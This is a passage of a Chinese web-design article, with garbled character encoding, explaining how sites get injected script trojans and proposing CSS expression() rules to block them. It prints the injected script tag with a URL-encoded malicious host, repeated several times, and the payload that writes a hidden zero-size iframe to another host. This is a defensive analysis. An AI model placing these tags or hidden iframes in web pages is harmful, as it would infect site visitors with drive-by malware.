|
還是掛馬問題,這段時(shí)間�,我漸漸感到壓力�,頭大��,通過QQ或MSN加我的人越來越多��,我最近自己的工作本來就忙得不亦樂乎����。哎,想想�����,還是要抽空來來幫幫大家。
前不久《http://bbs.blueidea.com/thread-2818052-1-1.html一行代碼解決iframe掛馬(包含服務(wù)器端注入��、客戶端ARP注入等)》得到了很多朋友的認(rèn)可���,這確實(shí)是個(gè)避避風(fēng)雨的好辦法����?涩F(xiàn)在掛網(wǎng)馬的方式真如我所料地改變了�,現(xiàn)在流行掛<script>木馬�,汗了,看了幾個(gè)網(wǎng)友的網(wǎng)站都被這樣了——頁面的頂部或底部加上了:
注意�,以下地址含有木馬,請(qǐng)不要輕易訪問:
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
汗死����,一連插入了N個(gè)一樣的<script>標(biāo)記。偶的電腦什么補(bǔ)丁都打了���,直接訪問這個(gè)http://%76%63%63%64%2E%63%6E(或直接使用迅雷下載)����,額~ 現(xiàn)形了:
document.write("<div style='display:none'>")
document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")
document.write("</div>")
又用迅雷下載http://a.158dm.com/b1.htm這個(gè)文件,一看�����,亂七八糟的JS編碼��,汗�����,不過找到了一個(gè)類似QQ號(hào)的數(shù)字��,直接加加看����,汗,然后是專業(yè)提供網(wǎng)馬的組織���,哎,什么世道��。還收費(fèi)蠻高滴呢���!
...
var Kfqq, Qqs="[color=Magenta]784378237[/color]"; qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs;
(...略)(下面還有N個(gè)統(tǒng)計(jì)的JS代碼)
針對(duì)上面的情況��,我也不能白白瞧著不管�,想想辦法吧,兄弟��。喝了碗綠豆粥�����,糖放得蠻多的����,好喝。辦法想到了����。稍微分析就得出了答案。大家來看看���,<script>木馬的特點(diǎn)是什么:
<script src=http://%76%63%63%64%2E%63%6E></script>
對(duì)了�,script木馬的src一般都是外域的���,也就是src是以http打頭的��,如果是自己網(wǎng)站的script一般都不用加上http�;再看看木馬的原形,里面還是輸出的iframe���、JS代碼或是其他<object>代碼�,不管這么多�,來多少殺多少。
來跟我寫CSS��,一一搞定它們,我寫了5種不同的方案�,大家來測試一下哈:
解決方案1:
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*這行代碼是解決掛IFRAME木馬的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木馬被成功隔離!'):'');}
原理:將<script>標(biāo)記的src拿出來轉(zhuǎn)為小寫,再看是不是以“http”開頭的外域JS腳本文件�����,如果是�����,則頁面內(nèi)容清空并寫出“木馬被成功隔離!”��。反之正常顯示���。
缺點(diǎn):訪客無法看到被感染了<script>木馬的頁面。
解決方案2:
iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}
原理:將外域的JS文件的document.write()使用document.close()強(qiáng)制關(guān)閉���。木馬內(nèi)容還沒有來得及寫完����,只有部分被強(qiáng)制緩存輸出了,剩下的不會(huì)再寫了�。
出處:藍(lán)色理想
責(zé)任編輯:bluehearts
上一頁 下一頁 二行代碼解決全部網(wǎng)頁木馬 [2]
◎進(jìn)入論壇網(wǎng)頁制作、WEB標(biāo)準(zhǔn)化版塊參加討論���,我還想發(fā)表評(píng)論�����。
|
第 1 頁 二行代碼解決全部網(wǎng)頁木馬 [1]
第 2 頁 
